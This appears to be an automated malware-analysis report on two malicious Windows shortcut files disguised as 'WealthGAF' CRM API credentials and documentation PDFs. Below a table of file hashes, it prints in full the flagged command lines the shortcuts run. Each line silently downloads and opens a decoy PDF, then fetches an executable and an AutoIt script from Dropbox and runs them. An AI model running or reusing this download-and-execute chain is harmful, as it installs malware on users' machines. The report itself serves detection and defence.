| Hash | Hash Value |
|---|---|
| MD5 | d9b3d1df47a4544ecc605f60b30d6060 |
| Sha1 | b78861c648a71e4639071d70397ee9365414435e |
| Sha256 | b570834a38ff9d5e085dc48700332e536635d23e7cfb9b93fe65be1ffb85e0f7 |
| Sha384 | cea6375abd9ecb361a5c2508ae1d370e001ed6f3ae13d9d43e139f35faffe841d873479addb23203a5998165da4e1af0 |
| Sha512 | 50889f2d38771c4d18b1f8bd3617949f75db2259793cc9a5a1d7e94daea8dd04297dbc6d20659ab21c57ed2cd4be0e3bc459021bb476518fc1c3507963cb6661 |
| SSDeep | 48:9oxKCip9v8QkeovLchXTWARl7p5NUZv63QXHHjLuGmA3N:6xKCKZ8NXqWE/tcHH13N |
| TLSH | 3A41298996D42068EAEB9370B93A4E81CA7332F4F636F00432482CC16AAE14D065FA5D |

| Name | Value |
|---|---|
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" https://www.dropbox.com/scl/fi/av1dqynlgpsbj7y4h11hr/WealthGAF_CRM_API_Credentials.pdf?rlkey=bxiufllo2bgannsp48hdx8dqp^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x |
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" https://www.dropbox.com/scl/fi/qtq8fi6lbzso0qk3hdnr5/WealthGAF_CRM_API_Documentation.pdf?rlkey=0e8aukx0avwk028s7dxib1ib7^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x |

| Name | Value | Location |
|---|---|---|
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" https://www.dropbox.com/scl/fi/av1dqynlgpsbj7y4h11hr/WealthGAF_CRM_API_Credentials.pdf?rlkey=bxiufllo2bgannsp48hdx8dqp^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x Malicious | d9b3d1df47a4544ecc605f60b30d6060 > WealthGAF_CRM_API_Credentials.pdf.lnk |
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" https://www.dropbox.com/scl/fi/qtq8fi6lbzso0qk3hdnr5/WealthGAF_CRM_API_Documentation.pdf?rlkey=0e8aukx0avwk028s7dxib1ib7^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x Malicious | d9b3d1df47a4544ecc605f60b30d6060 > WealthGAF_CRM_API_Documentation.pdf.lnk |